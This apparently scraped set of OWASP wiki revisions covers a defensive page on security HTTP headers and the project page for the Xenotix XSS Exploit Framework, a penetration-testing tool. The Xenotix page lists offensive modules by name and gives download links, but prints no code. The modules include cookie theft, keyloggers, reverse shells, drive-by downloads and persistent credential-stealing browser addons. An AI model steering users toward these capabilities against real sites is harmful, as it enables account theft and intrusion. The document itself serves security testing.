**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=https://drive.google.com/file/d/0B_Ci-1YbMqshNHc3RFRPTzcyM00/view?usp=sharing]]
SHA256: 68096d574aacf51cea46708d473d5c6b13d3b5039c8f3587d2325c9bdefdcbc1
====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6.1 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip | MD5: 17c703f90dbb4f09b112284232bbb69f
*Version 6.1 Mirror: https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view | MD5: 17c703f90dbb4f09b112284232bbb69f
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>

= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Goodies =
== Xenotix Hoodies ==
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]

== Purchase ==
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]
= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

List of useful HTTP headers

2015-05-16T09:06:40Z

Ajin Abraham: rfc name correction

This page lists useful security-related HTTP headers. In most architectures these headers can be set in web server configuration ([http://httpd.apache.org/docs/2.2/mod/mod_headers.html Apache], [http://technet.microsoft.com/pl-pl/library/cc753133(v=ws.10).aspx IIS], [http://nginx.org/en/docs/http/ngx_http_headers_module.html nginx]), without changing actual application's code. This offers significantly faster and cheaper method for at least partial mitigation of existing issues, and an additional layer of defense for new applications.

{| border="1"
|-
! Header name
! Description
! Example
|-
|[https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning Public Key Pinning Extension for HTTP]
|The Public Key Pinning Extension for HTTP (HPKP) is a security header that tells a web client to associate a specific cryptographic public key with a certain web server to prevent MITM attacks with forged certificates.
|<code>Public-Key-Pins: pin-sha256="<sha256>"; pin-sha256="<sha256>"; max-age=15768000; includeSubDomains </code>
|-
|[http://tools.ietf.org/html/rfc6797 Strict-Transport-Security]
|HTTP Strict-Transport-Security (HSTS) enforces secure (HTTP over SSL/TLS) connections to the server. This reduces impact of bugs in web applications leaking session data through cookies and external links and defends against Man-in-the-middle attacks. HSTS also disables the ability for user's to ignore SSL negotiation warnings.
|<code>Strict-Transport-Security: max-age=16070400; includeSubDomains</code>
|-
| [http://tools.ietf.org/html/draft-ietf-websec-x-frame-options-01 X-Frame-Options], [http://tools.ietf.org/html/draft-ietf-websec-frame-options-00 Frame-Options]
| Provides [[Clickjacking]] protection. Values: ''deny'' - no rendering within a frame, ''sameorigin'' - no rendering if origin mismatch, ''allow-from: DOMAIN'' - allow rendering if framed by frame loaded from ''DOMAIN''
| <code> X-Frame-Options: deny</code>
|-
| [http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx X-XSS-Protection]
| This header enables the [[Cross-site scripting]] (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.
| <code>X-XSS-Protection: 1; mode=block</code>
|-
| [http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx X-Content-Type-Options]
| The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to [http://code.google.com/chrome/extensions/hosting.html Google Chrome], when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.
| <code> X-Content-Type-Options: nosniff </code>
|-
|[http://www.w3.org/TR/CSP/ Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP]
|[[Content Security Policy]] requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including [[Cross-site scripting]] and other cross-site injections.
|<code>Content-Security-Policy: default-src 'self'</code>
|-
| [http://www.w3.org/TR/CSP/ Content-Security-Policy-Report-Only]
| Like Content-Security-Policy, but only reports. Useful during implementation, tuning and testing efforts.
| <code>Content-Security-Policy-Report-Only: default-src 'self'; report-uri http://loghost.example.com/reports.jsp</code>
|}

==Check Your Headers==

Visit Check Your Headers to view and evaluate any website's security headers. http://cyh.herokuapp.com/cyh

For Chrome, the Recx Security Analyser extension checks a number of security relevant headers and gives a nice report on the findings.
[https://chrome.google.com/webstore/detail/recx-security-analyser/ljafjhbjenhgcgnikniijchkngljgjda Recx Security Analyser]

==Real life examples==
Below examples present selected HTTP headers as set by popular websites to demonstrate that they are indeed being used in production services:

===Facebook===
As of January 2013 [https://www.facebook.com/ Facebook] main page was setting these security related HTTP headers.

'''Strict-Transport-Security:''' max-age=60
'''X-Content-Type-Options:''' nosniff
'''X-Frame-Options:''' DENY
'''X-WebKit-CSP:''' <small><nowiki>default-src *; script-src https://*.facebook.com
http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net
*.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:*
'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net;
style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com
https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:*
https://*.akamaihd.net ws://*.facebook.com:* http://*.akamaihd.net;</nowiki></small>
'''X-XSS-Protection:''' 1; mode=block

Especially interesting is Facebook's use of [http://www.w3.org/TR/CSP/ Content Security Policy] (using Google Chrome syntax), whose implementation can be [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ challenging] for large sites with heavy usage of JavaScript.

As of July 2014, the following headers were set:

'''strict-transport-security: max-age=7776000'''
'''x-content-type-options: nosniff'''
'''x-frame-options: DENY'''
'''content-security-policy: <small><nowiki> default-src *;script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net
*.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net
*.atlassolutions.com chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl;style-src * 'unsafe-inline';connect-src https://*.facebook.com http://*.facebook.com
https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net
https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;</nowiki></small>'''
'''x-xss-protection:0'''

===Google+===
As of January 2013 [https://plus.google.com/ Google+] main page was setting these security related HTTP headers:

'''x-content-type-options:''' nosniff
'''x-frame-options:''' SAMEORIGIN
'''x-xss-protection:''' 1; mode=block

===Twitter===
As of May 2013 [https://twitter.com/ Twitter] main page was setting these security related HTTP headers:

'''strict-transport-security:''' max-age=631138519
'''x-frame-options:''' SAMEORIGIN
'''x-xss-protection:''' 1; mode=block

As of July 2014 we can see the implementation of CSP added:
'''<nowiki>content-security-policy-report-only: default-src https:; connect-src https:; font-src https: data:; frame-src https:
http://*.twimg.com http://itunes.apple.com about: javascript:; img-src https: data:; media-src https:; object-src https:;
script-src 'unsafe-inline' 'unsafe-eval' about: https:; style-src 'unsafe-inline' https:; report-uri
https://twitter.com/i/csp_report?a=NVQWGBBBFVZXO2LAAA%3D%3D%3D%3D%3D%3D&ro=true;</nowiki>'''

List of useful HTTP headers

2015-05-11T07:37:53Z

Ajin Abraham: added HPKP

This page lists useful security-related HTTP headers. In most architectures these headers can be set in web server configuration ([http://httpd.apache.org/docs/2.2/mod/mod_headers.html Apache], [http://technet.microsoft.com/pl-pl/library/cc753133(v=ws.10).aspx IIS], [http://nginx.org/en/docs/http/ngx_http_headers_module.html nginx]), without changing actual application's code. This offers significantly faster and cheaper method for at least partial mitigation of existing issues, and an additional layer of defense for new applications.

{| border="1"
|-
! Header name
! Description
! Example
|-
|[https://developer.mozilla.org/en-US/docs/Web/Security/Public_Key_Pinning HTTP Public Key Pinning]
|The HTTP Public Key Pinning (HPKP) is a security header that tells a web client to associate a specific cryptographic public key with a certain web server to prevent MITM attacks with forged certificates.
|<code>Public-Key-Pins: pin-sha256="<sha256>"; pin-sha256="<sha256>"; max-age=15768000; includeSubDomains </code>
|-
|[http://tools.ietf.org/html/rfc6797 Strict-Transport-Security]
|HTTP Strict-Transport-Security (HSTS) enforces secure (HTTP over SSL/TLS) connections to the server. This reduces impact of bugs in web applications leaking session data through cookies and external links and defends against Man-in-the-middle attacks. HSTS also disables the ability for user's to ignore SSL negotiation warnings.
|<code>Strict-Transport-Security: max-age=16070400; includeSubDomains</code>
|-
| [http://tools.ietf.org/html/draft-ietf-websec-x-frame-options-01 X-Frame-Options], [http://tools.ietf.org/html/draft-ietf-websec-frame-options-00 Frame-Options]
| Provides [[Clickjacking]] protection. Values: ''deny'' - no rendering within a frame, ''sameorigin'' - no rendering if origin mismatch, ''allow-from: DOMAIN'' - allow rendering if framed by frame loaded from ''DOMAIN''
| <code> X-Frame-Options: deny</code>
|-
| [http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx X-XSS-Protection]
| This header enables the [[Cross-site scripting]] (XSS) filter built into most recent web browsers. It's usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. This header is supported in IE 8+, and in Chrome (not sure which versions). The anti-XSS filter was added in Chrome 4. Its unknown if that version honored this header.
| <code>X-XSS-Protection: 1; mode=block</code>
|-
| [http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx X-Content-Type-Options]
| The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to [http://code.google.com/chrome/extensions/hosting.html Google Chrome], when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.
| <code> X-Content-Type-Options: nosniff </code>
|-
|[http://www.w3.org/TR/CSP/ Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP]
|[[Content Security Policy]] requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including [[Cross-site scripting]] and other cross-site injections.
|<code>Content-Security-Policy: default-src 'self'</code>
|-
| [http://www.w3.org/TR/CSP/ Content-Security-Policy-Report-Only]
| Like Content-Security-Policy, but only reports. Useful during implementation, tuning and testing efforts.
| <code>Content-Security-Policy-Report-Only: default-src 'self'; report-uri http://loghost.example.com/reports.jsp</code>
|}

==Check Your Headers==

Visit Check Your Headers to view and evaluate any website's security headers. http://cyh.herokuapp.com/cyh

For Chrome, the Recx Security Analyser extension checks a number of security relevant headers and gives a nice report on the findings.
[https://chrome.google.com/webstore/detail/recx-security-analyser/ljafjhbjenhgcgnikniijchkngljgjda Recx Security Analyser]

==Real life examples==
Below examples present selected HTTP headers as set by popular websites to demonstrate that they are indeed being used in production services:

===Facebook===
As of January 2013 [https://www.facebook.com/ Facebook] main page was setting these security related HTTP headers.

'''Strict-Transport-Security:''' max-age=60
'''X-Content-Type-Options:''' nosniff
'''X-Frame-Options:''' DENY
'''X-WebKit-CSP:''' <small><nowiki>default-src *; script-src https://*.facebook.com
http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net
*.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:*
'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net;
style-src * 'unsafe-inline'; connect-src https://*.facebook.com http://*.facebook.com
https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:*
https://*.akamaihd.net ws://*.facebook.com:* http://*.akamaihd.net;</nowiki></small>
'''X-XSS-Protection:''' 1; mode=block

Especially interesting is Facebook's use of [http://www.w3.org/TR/CSP/ Content Security Policy] (using Google Chrome syntax), whose implementation can be [http://www.html5rocks.com/en/tutorials/security/content-security-policy/ challenging] for large sites with heavy usage of JavaScript.

As of July 2014, the following headers were set:

'''strict-transport-security: max-age=7776000'''
'''x-content-type-options: nosniff'''
'''x-frame-options: DENY'''
'''content-security-policy: <small><nowiki> default-src *;script-src https://*.facebook.com http://*.facebook.com https://*.fbcdn.net http://*.fbcdn.net *.facebook.net
*.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' https://*.akamaihd.net http://*.akamaihd.net
*.atlassolutions.com chrome-extension://lifbcibllhkdhoafpjfnlhfpfgnpldfl;style-src * 'unsafe-inline';connect-src https://*.facebook.com http://*.facebook.com
https://*.fbcdn.net http://*.fbcdn.net *.facebook.net *.spotilocal.com:* https://*.akamaihd.net wss://*.facebook.com:* ws://*.facebook.com:* http://*.akamaihd.net
https://fb.scanandcleanlocal.com:* *.atlassolutions.com http://attachment.fbsbx.com https://attachment.fbsbx.com;</nowiki></small>'''
'''x-xss-protection:0'''

===Google+===
As of January 2013 [https://plus.google.com/ Google+] main page was setting these security related HTTP headers:

'''x-content-type-options:''' nosniff
'''x-frame-options:''' SAMEORIGIN
'''x-xss-protection:''' 1; mode=block

===Twitter===
As of May 2013 [https://twitter.com/ Twitter] main page was setting these security related HTTP headers:

'''strict-transport-security:''' max-age=631138519
'''x-frame-options:''' SAMEORIGIN
'''x-xss-protection:''' 1; mode=block

As of July 2014 we can see the implementation of CSP added:
'''<nowiki>content-security-policy-report-only: default-src https:; connect-src https:; font-src https: data:; frame-src https:
http://*.twimg.com http://itunes.apple.com about: javascript:; img-src https: data:; media-src https:; object-src https:;
script-src 'unsafe-inline' 'unsafe-eval' about: https:; style-src 'unsafe-inline' https:; report-uri
https://twitter.com/i/csp_report?a=NVQWGBBBFVZXO2LAAA%3D%3D%3D%3D%3D%3D&ro=true;</nowiki>'''

OWASP Xenotix XSS Exploit Framework

2015-01-20T08:26:02Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]
[[Image:ToolsWatch2013.png |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]

== NEWS AND EVENTS ==
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
**DOM XSS Analyzer
**Local DOM XSS Analyzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]
MD5: 17c703f90dbb4f09b112284232bbb69f

* Xenotix is now available for Android Devices. [Download | http://m.xenotix.in]
====Requirements====
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>

= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''
==V6.1 Changes==
* Bug Fixes
* Updated QuickPHP Server
* Local DOM XSS Analyzer
==V6 Changes==
{{#ev:youtube|RhGVuus_NJw}}
* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
